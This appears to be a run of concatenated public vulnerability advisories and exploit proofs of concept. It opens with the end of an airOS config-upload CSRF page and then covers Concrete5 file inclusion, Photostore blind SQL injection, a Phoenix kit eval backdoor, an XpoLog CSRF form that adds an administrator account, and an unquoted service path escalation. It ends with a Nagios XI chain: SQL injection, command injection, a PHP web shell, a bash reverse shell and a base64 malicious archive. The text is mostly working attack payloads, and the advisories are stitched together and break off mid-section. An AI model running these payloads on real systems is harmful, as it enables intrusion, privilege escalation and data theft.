"dhcpd.1.end=192.168.1.254\n" +
"dhcpd.1.dnsproxy=enabled\n" +
"dhcpd.1.devname=br0\n" +
"dhcpd.1.dns.2.status=disabled\n" +
"dhcpd.1.dns.2.server=\n" +
"dhcpd.1.dns.1.status=disabled\n" +
"dhcpd.1.dns.1.server=\n" +
"dhcpd.1.status=enabled\n" +
"dhcpd.status=enabled\n" +
"dhcpc.1.status=enabled\n" +
"dhcpc.1.fallback_netmask=255.255.255.0\n" +
"dhcpc.1.fallback=192.168.10.1\n" +
"dhcpc.1.devname=eth0\n" +
"dhcpc.status=enabled\n" +
"bridge.1.fd=1\n" +
"bridge.1.comment=\n" +
"bridge.1.port.2.devname=eth1\n" +
"bridge.1.port.2.status=enabled\n" +
"bridge.1.port.1.devname=ath0\n" +
"bridge.1.port.1.status=enabled\n" +
"bridge.1.stp.status=disabled\n" +
"bridge.1.devname=br0\n" +
"bridge.1.status=enabled\n" +
"bridge.status=enabled\n" +
"aaa.status=disabled\n" +
"aaa.1.status=disabled\n" +
"aaa.1.radius.macacl.status=disabled\n" +
"aaa.1.radius.auth.1.status=disabled\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgupload\"\r\n" +
"\r\n" +
"Upload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"cfgupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"systemdate\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
document.getElementById("airos-exploit-apply").submit();
</script>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
-------------------------------------------------------------------------------
Concrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability
-------------------------------------------------------------------------------
[-] Software Link:
https://www.concrete5.org/
[-] Affected Versions:
Version 5.7.3.1 and probably other versions.
[-] Vulnerability Description:
The vulnerable code is located within the "Application::dispatch()" method:
326. public function dispatch(Request $request)
327. {
328. if ($this->installed) {
329. $response = $this->getEarlyDispatchResponse();
330. }
331. if (!isset($response)) {
332. $collection = Route::getList();
333. $context = new \Symfony\Component\Routing\RequestContext();
334. $context->fromRequest($request);
335. $matcher = new UrlMatcher($collection, $context);
336. $path = rtrim($request->getPathInfo(), '/') . '/';
337. try {
338. $request->attributes->add($matcher->match($path));
339. $matched = $matcher->match($path);
340. $route = $collection->get($matched['_route']);
341. Route::setRequest($request);
342. $response = Route::execute($route, $matched);
The vulnerability exists because the path for the incoming request is retrieved using the
"Request::getPathInfo()" method from the Symfony framework, which allows to specify the path
for the request within some HTTP headers (like "X-Original-URL" and some others). So, it might
be possible to specify paths containing "dot-dot-slash" sequences without worrying about URL
encoding and path normalization done by the web server. This could be exploited by unauthenticated
attackers to include arbitrary .php files located outside the Concrete5 root directory or from the
Concrete5 codebase itself (potentially leading to unauthorized access to certain functionalities)
by sending an HTTP request like this:
GET /concrete5/index.php HTTP/1.1
Host: localhost
X-Original-Url: /tools/../../index
Connection: keep-alive
The dispatching process for this request will try to re-include the index.php file,
and this will end up with an unexpected error.
[-] Solution:
Update to a fixed version.
[-] Disclosure Timeline:
[05/05/2015] - Vulnerability details sent through HackerOne
[02/10/2015] - CVE number requested
[19/12/2015] - Vulnerability fixed on the GitHub repository
[26/06/2016] - Vulnerability publicly disclosed on HackerOne
[28/06/2016] - Publication of this advisory
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-10
[-] Other References:
https://hackerone.com/reports/59665
Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
CVE-ID : CVE-2016-4337
Google Dork: inurl:mgr.login.php
Product : Photostore
Affected : Versions prior to 4.7.5
Impact : Critical
Remote : Yes
Website link: http://www.ktools.net
Reported : 02/06/2016
Authors : Gal Goldshtein and Viktor Minin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
No authentication (login) is required to exploit this vulnerability.
The Photostore application password recovery module is prone to a blind sql injection attack.
An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.
Vulnerable code is located in the mgr.login.php file:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
case 'recover_login': {
mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );
$result = ;
mysqli_num_rows( $result );
$returned_rows = ;
mysqli_fetch_array( $result );
$db_admin_user = ;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PoC:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
Host: victim.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
email=%27%20[SQL PAYLOAD];#
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-06-30
# Tested on: MSWin32
# Vuln file : geoip.php
492. isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();
# Screen : http://i.imgur.com/E7RBBRk.png
__END__
XpoLog Center V6 CSRF Remote Command Execution
Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
6.4254
6.4252
6.4250
6.4237
6.4235
5.4018
Summary: Applications Log Analysis and Management Platform.
Desc: XpoLog suffers from arbitrary command execution. Attackers
can exploit this issue using the task tool feature and adding a
command with respected arguments to given binary for execution.
In combination with the CSRF an attacker can execute system commands
with SYSTEM privileges.
Tested on: Apache-Coyote/1.1
Microsoft Windows Server 2012
Microsoft Windows 7 Professional SP1 EN 64bit
Java/1.7.0_45
Java/1.8.0.91
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5335
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php
14.06.2016
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"
<html>
<body>
<form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST">
<input type="hidden" name="" value="" />
<input type="hidden" name="csrfToken" value="NoToken" />
<input type="hidden" name="taskId" value="1465930398522" />
<input type="hidden" name="taskType" value="exe" />
<input type="hidden" name="name" value="CCMMDD" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="IsSsh" value="false" />
<input type="hidden" name="exePath" value=""c:\\windows\\system32\\cmd.exe"" />
<input type="hidden" name="exeArgs" value=""/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"" />
<input type="hidden" name="exeEnvVar" value="" />
<input type="hidden" name="exeWorkDir" value="" />
<input type="hidden" name="exeOutputTargetFile" value="" />
<input type="hidden" name="NameXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="IdXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="actionIdXpoTaskSched" value="0" />
<input type="hidden" name="StateXpoTaskSched" value="1" />
<input type="hidden" name="schedulerSuffix" value="XpoTaskSched" />
<input type="hidden" name="trigTypeXpoTaskSched" value="cron" />
<input type="hidden" name="minutesXpoTaskSched" value="0" />
<input type="hidden" name="minutesEndXpoTaskSched" value="0" />
<input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" />
<input type="hidden" name="frequencyXpoTaskSched" value="daily" />
<input type="hidden" name="DayInMonthXpoTaskSched" value="all" />
<input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" />
<input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" />
<input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" />
<input type="hidden" name="hoursXpoTaskSched" value="0" />
<input type="hidden" name="hoursEndXpoTaskSched" value="0" />
<input type="hidden" name="hoursOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="minutesOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="secondsOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="jobPriority" value="-1" />
<input type="hidden" name="ajaxTimestamp" value="1465930905166" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"
GET
http://10.0.0.17:30303/logeye/testingus.txt
Response:
nt authority\system
# Exploit Title: League of Legends Screensaver Unquoted Service Paths
Conditional Privilege Escalation.
# CVE-ID: NA
# Date: 13/04/2016
# Exploit Author: Vincent Yiu
# Contact: vysec.private@gmail.com
# Vendor Homepage: http://www.leagueoflegends.com
# Software Link: screensaver.euw.leagueoflegends.com/en_US
# Version: MD5 Hash: 0C1B02079CA8BF850D59DD870BC09963
# Tested on: Windows 7 Professional x64 fully updated.
1. Description:
The League of Legends installer would install the League of Legends
screensaver along with a service. The service would be called
'lolscreensaver'. This particular service was misconfigured such that
the service binary path was unquoted. When the screensaver is
installed to 'C:\Riot Games', the issue is not exploitable. However,
during the installation process, users are able to specify a directory
to install to. When a user chooses to install this to say an external
drive, this becomes exploitable.
This was reported to Riot Games and has been rectified in the latest version.
2. Proof
http://i.imgur.com/S2fuUKa.png
3. Exploit:
Simply run 'sc qc lolscreensaver' and check for unquoted service path.
If the path is unquoted, then check the permissions of each directory
using space as a token.
Eg. D:\My Games\Hidden Files\Super Secure\Riot Games\service\service.exe
Do icacls on D:\, 'D:\My Games\', 'D:\My Games\Hidden Files\', 'D:\My
Games\Hidden Files\Super Secure\'. If you are able to write files to
any of these directories, it is exploitable.
If 'D:\My Games\' is writable, to exploit this issue, place a binary
to run as SYSTEM into the folder and named as 'Hidden.exe".
This is released on exploit-db as a means to make users aware. There was no way to automatically install a patch or update to fix this issue. It is recommended that the screensaver is uninstalled and redownloaded from the official website where this issue is now resolved.
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Nagios XI Multiple Vulnerabilities
Affected versions: Nagios XI <= 5.2.7
PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf
+-----------+
|Description|
+-----------+
The Nagios XI application is affected by multiple security
vulnerabilities, including unauthenticated SQL injection and
authentication bypass, arbitrary code execution via command injection,
privilege escalation, server-side request forgery and account hijacking.
These vulnerabilities can be chained together to obtain unauthenticated
remote code execution as the root user.
+------------+
|Exploitation|
+------------+
==SQL Injection==
The ‘host’ and ‘service’ GET parameters in the ‘nagiosim.php’ page are
vulnerable to SQL injection via error-based payloads. An attacker can
exploit this vulnerability to retrieve sensitive information from the
application’s MySQL database such as the administrative users’ password
hash (unsalted MD5) or the token used to authenticate to the Nagios XI
REST API. This security issue is aggravated by the fact that an attacker
can directly browse to the vulnerable page and exploit the vulnerability
without providing a valid session cookie.
[POC - DUMP ADMIN API TOKEN]
GET
/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service='+AND+
(SELECT+1+FROM(SELECT+COUNT(*),CONCAT('|APIKEY|',(SELECT+MID((IFNULL(CAST(backend_ticket+AS
+CHAR),0x20)),1,54)+FROM+xi_users+WHERE+user_id%3d1+LIMIT+0,1),'|APIKEY|',FLOOR(RAND(0)*2))
x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+OR+' HTTP/1.1
The API token can be reused to bypass authentication either by creating
a user via the REST API or through the Rapid Response functionality as
shown below.
[POC- BYPASS AUTHENTICATION THROUGH RAPID RESPONSE FUNCTIONALITY]
// uid == <user_id>-<object_id>-<MD5(api token)>, object id value
doesn't matter
GET /nagiosxi/rr.php?uid=1-b-<hash> HTTP/1.1
==Command Injection==
Multiple command injection vulnerabilities exist in the Nagios XI web
interface due to unescaped user input being passed to shell functions as
an argument. This issues can be exploited to inject arbitrary shell
commands and obtain remote code execution in the context of the 'apache'
user.
URL => GET
/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=<api
token>&incident_id=<valid incident id>&title=<PAYLOAD>&status=<any value>
PARAMETER => title
POC PAYLOAD => title'; touch /tmp/FILE; echo '
URL => GET
/nagiosxi/includes/components/perfdata/graphApi.php?host=<any monitored
host IP>&start=<PAYLOAD>&end=<PAYLOAD>
PARAMETERS => start, end
POC PAYLOAD => 1; touch /tmp/FILE;
==Privilege Escalation==
The Nagios XI default sudoers configuration can be abused to elevate
privileges to root due to an insecure implementation of the
application’s component upload functionality. The ‘apache’ user can run
the getprofile.sh script with root privileges without being prompted for
a password. The getprofile.sh script is part of the Profile component
along with the following files:
- profile.php, the PHP script that outputs the system information.
- profile.inc.php, a PHP include file with required functionality for
profile.php.
An attacker can backdoor the profile.php file with a function to execute
arbitrary shell commands (e.g. <?php system($_GET['cmd']); ?> ), replace
the getprofile.sh file with a malicious payload (e.g. “#!/bin/bash bash
–i >& /dev/tcp/<IP>/<PORT> 0>&1”) and finally create a ‘profile.zip’
archive containing the malicious component files. Once uploaded, the
application will unzip the component archive and overwrite the existing
profile directory and its files, including getprofile.sh.
[POC - MALICIOUS 'profile.zip' COMPONENT ARCHIVE]
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
vREAAAAA
[POC - PRIVILEGE ESCALATION EXPLOITATION]
GET /nagiosxi/includes/components/profile/profile.php?cmd=sudo
./getprofile.sh
The default Profile component archive can be downloaded at the following
link:
https://assets.nagios.com/downloads/nagiosxi/components/profile.zip
==Server-Side Request Forgery==
Multiple server-side request forgery vulnerabilities exist in the Nagios
XI application. An attacker can provide arbitrary data to curl_exec
calls to port scan internal services listening on localhost, read files
on the Nagios XI server file system or send data to other hosts in the
same internal network where the Nagios XI server is deployed.
// the application filter the string 'file://' can be bypassed by
converting the handler to uppercase
URL => GET /nagiosxi/ajaxproxy.php?proxyurl=<PAYLOAD>
PARAMETER => proxyurl
POC PAYLOAD => FILE:///<path>/<file>
URL => GET /nagiosxi/backend/?cmd=geturlhtml&url=<PAYLOAD>
PARAMETER => url
POC PAYLOAD => file:///<path>/<file>
==Account Hijacking==
